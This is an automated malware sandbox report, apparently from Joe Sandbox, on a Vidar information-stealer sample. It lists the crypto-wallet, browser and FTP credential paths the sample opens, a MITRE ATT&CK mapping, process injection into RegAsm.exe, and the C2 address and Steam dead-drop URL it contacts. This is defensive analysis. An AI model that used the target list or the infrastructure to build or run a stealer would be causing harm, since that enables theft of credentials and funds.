Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Yara matchFile source: 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7532, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 0.2.file.exe.3eeac0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3eeac0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7448, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7532, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		511
                        Process Injection                        		1
                        Masquerading                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services1
                        Screen Capture                        		21
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		Boot or Logon Initialization Scripts1
                        DLL Side-Loading                        		511
                        Process Injection                        		1
                        Credentials in Registry                        		141
                        Security Software Discovery                        		Remote Desktop Protocol1
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                        Deobfuscate/Decode Files or Information                        		Security Account Manager12
                        Process Discovery                        		SMB/Windows Admin Shares4
                        Data from Local System                        		3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                        Obfuscated Files or Information                        		NTDS1
                        Account Discovery                        		Distributed Component Object ModelInput Capture114
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets1
                        System Owner/User Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials3
                        File and Directory Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync54
                        System Information Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428826 Sample: file.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 29 steamcommunity.com 2->29 35 Found malware configuration 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 Yara detected Vidar 2->39 41 5 other signatures 2->41 7 file.exe 1 2->7         started        signatures3 process4 signatures5 43 Contains functionality to inject code into remote processes 7->43 45 Writes to foreign memory regions 7->45 47 Allocates memory in foreign processes 7->47 49 Injects a PE file into a foreign processes 7->49 10 RegAsm.exe 36 7->10         started        15 RegAsm.exe 7->15         started        17 conhost.exe 7->17         started        19 2 other processes 7->19 process6 dnsIp7 31 37.27.87.155, 443, 49731, 49732 UNINETAZ Iran (ISLAMIC Republic Of) 10->31 33 steamcommunity.com 184.30.122.179, 443, 49730 AKAMAI-ASUS United States 10->33 21 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 10->21 dropped 23 C:\Users\user\AppData\...\softokn3[1].dll, PE32 10->23 dropped 25 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 10->25 dropped 27 10 other files (none is malicious) 10->27 dropped 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 10->51 53 Found many strings related to Crypto-Wallets (likely being stolen) 10->53 55 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->55 59 4 other signatures 10->59 57 Searches for specific processes (likely to inject) 15->57 file8 signatures9

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        file.exe100%AviraHEUR/AGEN.1352999
                        file.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://mozilla.org0/0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        steamcommunity.com
                        		184.30.122.179
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://37.27.87.155/sqln.dllfalse
                            		unknown
                            https://37.27.87.155/softokn3.dllfalse
                              		unknown
                              https://37.27.87.155/nss3.dllfalse
                                		unknown
                                https://37.27.87.155/vcruntime140.dllfalse
                                  		unknown
                                  https://37.27.87.155/msvcp140.dllfalse
                                    		unknown
                                    https://37.27.87.155/false
                                      		unknown
                                      https://37.27.87.155/freebl3.dllfalse
                                        		unknown
                                        https://steamcommunity.com/profiles/76561199673019888false
                                          		high
                                          https://37.27.87.155/mozglue.dllfalse
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabGDHIEHJE.5.drfalse
                                              		high
                                              https://37.27.87.155/freebl3.dllrRegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://duckduckgo.com/ac/?q=GDHIEHJE.5.drfalse
                                                  		high
                                                  https://steamcommunity.com/login/home/?goto=profiles%2F7656119967301988876561199673019888[1].htm.5.drfalse
                                                    		high
                                                    https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                      		high
                                                      https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                        		high
                                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                          		high
                                                          https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=englRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                            		high
                                                            http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                              		high
                                                              https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                		high
                                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                  		high
                                                                  https://37.27.87.155/softokn3.dllXRegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                      		high
                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://37.27.87.155/vcruntime140.dll&RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=englishRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                            		high
                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                              		high
                                                                              https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=englishRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                		high
                                                                                https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=enRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                  		high
                                                                                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                    		high
                                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&amRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                      		high
                                                                                      https://steamcommunity.com/yFRegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMMRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                          		high
                                                                                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jU8h8CqVh6FY&l=eRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                            		high
                                                                                            http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.drfalse
                                                                                              		high
